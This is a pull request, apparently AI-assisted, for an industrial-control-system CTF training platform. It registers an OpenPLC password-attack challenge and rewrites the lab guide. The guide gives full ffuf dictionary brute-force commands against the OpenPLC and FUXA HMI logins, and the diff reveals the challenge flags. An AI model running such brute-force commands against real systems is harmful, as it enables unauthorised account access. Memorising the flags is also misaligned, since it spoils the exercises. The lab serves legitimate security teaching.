### PR TITLE
fix(landing): make both password-attack flags scored and unambiguous

### DIFF
--- a/software/landing/ctf_config.json
+++ b/software/landing/ctf_config.json
@@ -3,7 +3,7 @@
   "description": "Industrial Control Systems Security Training Platform",
   "categories": {
     "basic_understanding": {
-      "name": "🏭 Basic Understanding",
+      "name": "\ud83c\udfed Basic Understanding",
       "description": "Fundamental understanding of industrial processes and control systems",
       "challenges": [
         {
@@ -29,7 +29,7 @@
       ]
     },
     "network_analysis": {
-      "name": "🔍 Network Analysis",
+      "name": "\ud83d\udd0d Network Analysis",
       "description": "Network reconnaissance and traffic analysis techniques",
       "challenges": [
         {
@@ -65,7 +65,7 @@
       ]
     },
     "security_testing": {
-      "name": "⚔️ Security Testing",
+      "name": "\u2694\ufe0f Security Testing",
       "description": "Test system resilience and security mechanisms",
       "challenges": [
         {
@@ -80,12 +80,22 @@
         },
         {
           "id": "password_attack",
-          "title": "Password Attack",
-          "description": "Practice password security testing",
+          "title": "FUXA Password Attack",
+          "description": "Brute-force the FUXA HMI login and recover the flag shown after login",
           "points": 150,
           "tag": "exploit",
           "flag": "CybICS(FU##A)",
           "hint": "Look for common passwords in authentication attempts",
+          "training_content": "training/password_attack/README.md"
+        },
+        {
+          "id": "password_openplc",
+          "title": "OpenPLC Password Attack",
+          "description": "Brute-force the OpenPLC web login and recover the flag from the user account",
+          "points": 150,
+          "tag": "exploit",
+          "flag": "CybICS(0penPLC)",
+          "hint": "Brute-force the OpenPLC admin login at port 8080 with ffuf, then read the flag from the user account details on the Users page.",
           "training_content": "training/password_attack/README.md"
         },
         {
@@ -111,7 +121,7 @@
       ]
     },
     "advanced_security": {
-      "name": "🔐 Advanced Security",
+      "name": "\ud83d\udd10 Advanced Security",
       "description": "Advanced attack and detection techniques",
       "challenges": [
         {
@@ -137,11 +147,11 @@
         {
           "id": "detect_basic",
           "title": "Detect Port Scan",
-          "description": "Perform a port scan and verify the IDS detected it — find the flag in the IDS rule stats",
+          "description": "Perform a port scan and verify the IDS detected it \u2014 find the flag in the IDS rule stats",
           "points": 250,
           "tag": "analysis",
           "flag": "CybICS(sc4n_d3tect3d)",
-          "hint": "Run a port scan, then query the IDS at /api/rules/stats — the flag appears when the port_scan rule has fired",
+          "hint": "Run a port scan, then query the IDS at /api/rules/stats \u2014 the flag appears when the port_scan rule has fired",
           "training_content": "training/detect_basic/README.md"
         },
         {
@@ -151,14 +161,14 @@
           "points": 400,
           "tag": "analysis",
           "flag": "CybICS(m0dbus_fl00d_d3tect3d)",
-          "hint": "Run the override script, then query /api/rules/stats — the flag appears when the modbus_flood rule fires",
+          "hint": "Run the override script, then query /api/rules/stats \u2014 the flag appears when the modbus_flood rule fires",
           "training_content": "training/detect_overwrite/README.md"
         }
       ]
     },
     "ids_challenges": {
-      "name": "🔍 IDS Challenges",
-      "description": "Interact with the Intrusion Detection System — trigger alerts, analyze incidents, and evade detection",
+      "name": "\ud83d\udd0d IDS Challenges",
+      "description": "Interact with the Intrusion Detection System \u2014 trigger alerts, analyze incidents, and evade detection",
       "challenges": [
         {
           "id": "ids_challenge",
@@ -193,7 +203,7 @@
       ]
     },
     "defense": {
-      "name": "🛡️ Defense & Hardening",
+      "name": "\ud83d\udee1\ufe0f Defense & Hardening",
       "description": "Harden the ICS environment by applying defensive security measures",
       "challenges": [
         {

--- a/training/password_attack/README.md
+++ b/training/password_attack/README.md
@@ -21,40 +21,40 @@ And the sent payload:
 ![Login Payload](doc/login_payload.png)
 
 ### 🛠️ Setup Steps
-1. Download ffuf:
-   ```sh
-   mkdir ~/ffuf
-   cd ~/ffuf
-   wget https://github.com/ffuf/ffuf/releases/download/v2.1.0/ffuf_2.1.0_linux_amd64.tar.gz
-   tar xf ffuf_2.1.0_linux_amd64.tar.gz
-   ```
+On the CybICS attack machine `ffuf` and the `rockyou` wordlist are already
+installed, so no download is needed:
 
-2. Get a wordlist:
-   ```sh
-   wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
-   ```
+```sh
+ffuf -h                                   # already on PATH
+ls /usr/share/wordlists/rockyou.txt       # bundled wordlist
+```
+
+If you work on a machine without them, install ffuf and fetch a wordlist:
+```sh
+wget https://github.com/ffuf/ffuf/releases/download/v2.1.0/ffuf_2.1.0_linux_amd64.tar.gz
+tar xf ffuf_2.1.0_linux_amd64.tar.gz
+wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
+```
 
 ### 🚀 Running the Attack
 Start ffuf with:
-- `-w ./rockyou.txt`: The downloaded wordlist
+- `-w /usr/share/wordlists/rockyou.txt`: The wordlist
 - `-X POST -H "Content-Type: application/x-www-form-urlencoded"`: Information from the login request
 - `-d "username=admin&password=FUZZ"`: Information from the login request payload (FUZZ is replaced by ffuf)
 - `-u http://$DEVICE_IP:8080/login`: The request URL
 - `-fs 4561`: The length of the response on wrong login
 
 ```sh
-./ffuf -v -w ./rockyou.txt -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -raw -u http://$DEVICE_IP:8080/login -fs 4561
+ffuf -v -w /usr/share/wordlists/rockyou.txt -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -raw -u http://$DEVICE_IP:8080/login -fs 4561
 ```
 
-For more info, start it without parameters:
-```sh
-./ffuf
-```
+For more info, run `ffuf` without parameters.
 
 ## 🎯 Task
-Brute-force the login credentials for both the OpenPLC web interface and the FUXA HMI using a dictionary attack with ffuf.
+This module covers two scored challenges, both solved with an ffuf dictionary attack. Flags have the format `CybICS(flag)`:
 
-The flag has the format `CybICS(flag)`.
+- **OpenPLC Password Attack** — brute-force the OpenPLC web login (port 8080) and read the flag from the user account. Flag: `CybICS(0penPLC)`.
+- **FUXA Password Attack** — brute-force the FUXA HMI login (port 1881) and read the flag shown after login. Flag: `CybICS(FU##A)`.
 
 ### Steps
 1. Analyze the OpenPLC login page at port 8080 (examine the request and response in the browser developer console)
@@ -64,9 +64,11 @@ The flag has the format `CybICS(flag)`.
 5. Apply the same approach to the FUXA HMI at port 1881
 6. Log in to FUXA and find the flag
 
-## 🔍 Solution (OpenPLC)
+## 🔍 Solution: OpenPLC Password Attack
 
-**Flag:** `CybICS(0penPLC)`
+Brute-force `admin` at `http://$DEVICE_IP:8080/login`, log in with the recovered password, open the **Users** page and read the admin account's details.
+
+**Flag:** `CybICS(0penPLC)` (submit for the *OpenPLC Password Attack* challenge)
 
   ![Flag OpenPLC Password](doc/flag.png)
 
@@ -117,13 +119,13 @@ FUXA is running at [http://<DEVICE_IP>:1881](http://<DEVICE_IP>:1881).
 - **OpenPLC**: The flag is part of the user information.
 - **FUXA**: The flag appears after successful login on the HMI.
 
-## 🔍 Solution (FUXA)
+## 🔍 Solution: FUXA Password Attack
 
 Run the attack:
   ```sh
-  ./ffuf -v -w ./rockyou.txt -X POST -H "Content-Type: application/json" -d '{"username": "admin", "password": "FUZZ"}' -raw -u http://$DEVICE_IP:1881/api/signin -fr "error"
+  ffuf -v -w /usr/share/wordlists/rockyou.txt -X POST -H "Content-Type: application/json" -d '{"username": "admin", "password": "FUZZ"}' -raw -u http://$DEVICE_IP:1881/api/signin -fr "error"
   ```
 
-**Flag:** `CybICS(FU##A)`
+**Flag:** `CybICS(FU##A)` (submit for the *FUXA Password Attack* challenge)
 
   ![Flag FUXA Password](doc/flag2.png)


### PR DESCRIPTION
## Cause

The `password_attack` how-to walks through brute-forcing both OpenPLC and FUXA
and reveals two flags, but only the FUXA flag `CybICS(FU##A)` was a registered
challenge. The OpenPLC flag `CybICS(0penPLC)` — presented with equal weight and
actually stored in the admin user's account — matched no challenge, so
submitting it failed and confused players. It was dead data.

## Fix

- Register the OpenPLC flag as its own challenge: `password_openplc`, "OpenPLC
  Password Attack", flag `CybICS(0penPLC)`, sharing the same how-to.
- Rename the existing challenge to "FUXA Password Attack" so the two are
  distinct.
- Rewrite the how-to so each solution section names the challenge its flag
  scores, and the task lists both.
- Point the setup at the `ffuf` binary and the `rockyou` wordlist now bundled on
  the attack machine (`/usr/share/wordlists/rockyou.txt`), with the downloads
  kept as a fallback for other hosts.

`CybICS(0penPLC)` is verified to match the seeded `openplc.db` admin account
exactly, so the challenge is earnable by the documented attack.

## Verified

`ctf_config.json` parses and now has both `password_attack` (FUXA) and
`password_openplc` (OpenPLC) with the correct titles and flags. No code paths
change; flag validation is the existing exact-match.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01Vxcv5CKGvRwXGhAQZqbcP5
